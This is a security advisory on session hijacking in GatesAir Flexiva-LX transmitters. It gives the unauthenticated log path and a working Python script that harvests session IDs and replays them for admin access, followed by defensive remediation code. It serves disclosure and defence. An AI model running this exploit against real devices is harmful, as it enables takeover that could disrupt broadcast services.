GatesAir Flexiva-LX Series Session Hijacking Vulnerability
Vulnerability
A session hijacking vulnerability has been identified in GatesAir Flexiva-LX devices running firmware versions 1.0.13 and 2.0. This issue affects models LX100, LX300, LX600, and LX1000. The vulnerability arises because the device writes session identifiers (sid) to a log file that its web server serves without authentication. An unauthenticated attacker can read those session IDs from the log and replay one as a cookie, taking over the session without any credentials. Exploitation requires that the legitimate user (admin) has closed the browser window without logging out, which leaves the session valid on the device.
Impact
Exploitation of this vulnerability gives an unauthenticated attacker full administrative access to the device, allowing unauthorized configuration changes that could disrupt critical broadcast services.
Reproduction
To reproduce this vulnerability, retrieve the log file at '/log/Flexiva%20LX.log' on the target device; no authentication is required. Search the log for 'sid' values, which are the session identifiers. Take a valid 'sid', set it as the session cookie in your browser, and reload the main page: you will be logged in as the admin user. Note that this only works while the admin's session is still valid on the device, i.e. the admin closed the browser without logging out.
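The steps above, scripted as an added example; this is not code from the advisory or from GatesAir. The log line format, the cookie name ('sid') and the sample log content are assumptions, since the advisory only states that 'sid' values appear in the log; the sample log below is constructed, not captured from a device.

```python
import re
import sys
import urllib.request

# Path of the publicly readable log, as given in the advisory.
LOG_PATH = "/log/Flexiva%20LX.log"

# Assumption: the session cookie is named after the log field. The advisory
# does not state the cookie name, so adjust after inspecting a real login.
COOKIE_NAME = "sid"

# Assumption: session IDs appear as "sid=<token>" in the log. A real log may
# format them differently; widen the pattern after looking at the file.
SID_RE = re.compile(r"\bsid=([0-9A-Za-z]{16,})")

# Constructed sample log content for offline use (not a real Flexiva-LX log).
SAMPLE_LOG = """\
2024-01-01 10:00:01 INFO  login user=admin sid=3f9a0c7e1b2d4e6f8a9b0c1d2e3f4a5b
2024-01-01 10:00:05 DEBUG page=/status sid=3f9a0c7e1b2d4e6f8a9b0c1d2e3f4a5b
2024-01-01 10:02:13 INFO  login user=admin sid=0011223344556677889900aabbccddee
2024-01-01 10:03:44 WARN  sensor temp=61
"""


def extract_sids(log_text):
    """Return the distinct session IDs in order of first appearance.

    Entries later in the log are newer, so the last element is the best
    candidate for a session that is still valid on the device.
    """
    seen = []
    for match in SID_RE.finditer(log_text):
        sid = match.group(1)
        if sid not in seen:
            seen.append(sid)
    return seen


def cookie_header(sid):
    """Build the Cookie header value that replays a harvested session ID."""
    return "%s=%s" % (COOKIE_NAME, sid)


def fetch_log(base_url):
    """Download the unauthenticated log file from the device."""
    with urllib.request.urlopen(base_url.rstrip("/") + LOG_PATH, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def request_main_page(base_url, sid):
    """Request the main page with the candidate cookie; return (status, body).

    The advisory does not say what the admin page looks like, so the caller
    must inspect the body for admin-only content to confirm the hijack.
    """
    req = urllib.request.Request(base_url, headers={"Cookie": cookie_header(sid)})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Usage: python hijack_check.py http://<device-ip>/   (authorized testing only)
    base = sys.argv[1] if len(sys.argv) > 1 else None
    log_text = fetch_log(base) if base else SAMPLE_LOG
    sids = extract_sids(log_text)
    print("found %d session id(s)" % len(sids))
    # Try the newest session first; it is the most likely to be unexpired.
    for candidate in reversed(sids):
        if base:
            status, body = request_main_page(base, candidate)
            print(candidate, status, len(body), "bytes")
        else:
            print(candidate, "->", cookie_header(candidate))
```

Without a URL argument the script runs against the constructed sample log only; with one, it downloads the real log and replays each session ID against the main page, newest first.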
Remediation
The root cause is fixed by not writing session identifiers to log files at all (redact or hash them before logging) and by restricting the log endpoint to authenticated users; encrypting and rotating stored log files is good practice but does not help while the log is served over an unauthenticated endpoint. As defense in depth, bind session tokens to the client's IP address and User-Agent (noting that IP binding can log out legitimate users whose address changes, for example behind carrier NAT), set session cookies with the 'Secure', 'HttpOnly', and 'SameSite=Strict' attributes, and, since a server cannot observe the browser being closed, issue the session cookie without an Expires or Max-Age attribute so the browser discards it on close, while enforcing an idle timeout and an absolute lifetime on the server side.
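The server-side controls listed above, shown together as an added example using only the Python standard library; this is illustrative code, not the Flexiva-LX firmware or any GatesAir code. The cookie name 'sid', the 'sid=<token>' log format, the 15-minute idle timeout and the sample log message are assumptions chosen for the demonstration.

```python
import io
import logging
import re
import secrets
import time

# Assumption: session IDs are logged as "sid=<token>", matching the advisory's field name.
SID_RE = re.compile(r"\b(sid=)([0-9A-Za-z_\-]+)")
COOKIE_NAME = "sid"          # assumed cookie name
IDLE_TIMEOUT = 15 * 60       # assumed idle timeout in seconds


def redact(text):
    """Mask every session identifier in a log message."""
    return SID_RE.sub(r"\1[REDACTED]", text)


class RedactSessionIds(logging.Filter):
    """Logging filter that masks session IDs before any handler writes them.

    Attach it to the handler, not only the logger: logger-level filters do not
    run for records propagated from child loggers.
    """

    def filter(self, record):
        record.msg = redact(record.getMessage())
        record.args = ()          # message is fully formatted now
        return True


def demo_redacted_log(sid):
    """Log a login message through the filter and return what was written."""
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.addFilter(RedactSessionIds())
    logger = logging.getLogger("flexiva.demo")
    logger.propagate = False
    logger.handlers = [handler]
    logger.setLevel(logging.INFO)
    logger.info("login user=%s sid=%s", "admin", sid)
    handler.flush()
    return buf.getvalue()


def session_cookie_header(sid):
    """Set-Cookie value with the hardened attributes and no Expires/Max-Age.

    Omitting Expires/Max-Age makes it a session cookie, so the browser drops it
    when closed; the server still enforces its own timeout below.
    """
    return "%s=%s; Secure; HttpOnly; SameSite=Strict" % (COOKIE_NAME, sid)


class SessionStore:
    """In-memory session store with idle timeout and client binding."""

    def __init__(self, idle_timeout=IDLE_TIMEOUT, clock=time.time):
        self._sessions = {}
        self.idle_timeout = idle_timeout
        self.clock = clock            # injectable for testing

    def create(self, user, client_ip, user_agent):
        sid = secrets.token_urlsafe(32)   # 256 bits of CSPRNG entropy
        self._sessions[sid] = {"user": user, "ip": client_ip,
                               "ua": user_agent, "last": self.clock()}
        return sid

    def lookup(self, sid, client_ip, user_agent):
        """Return the session's user, or None if expired, unknown or from another client."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self.clock()
        if now - sess["last"] > self.idle_timeout:
            del self._sessions[sid]     # idle too long: server-side invalidation
            return None
        if sess["ip"] != client_ip or sess["ua"] != user_agent:
            return None                 # token replayed from a different client
        sess["last"] = now
        return sess["user"]

    def logout(self, sid):
        self._sessions.pop(sid, None)
```

A replayed token from the advisory's scenario now fails twice over: the log no longer contains it, and even a token obtained elsewhere is rejected when presented from a different IP/User-Agent pair or after the idle window.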
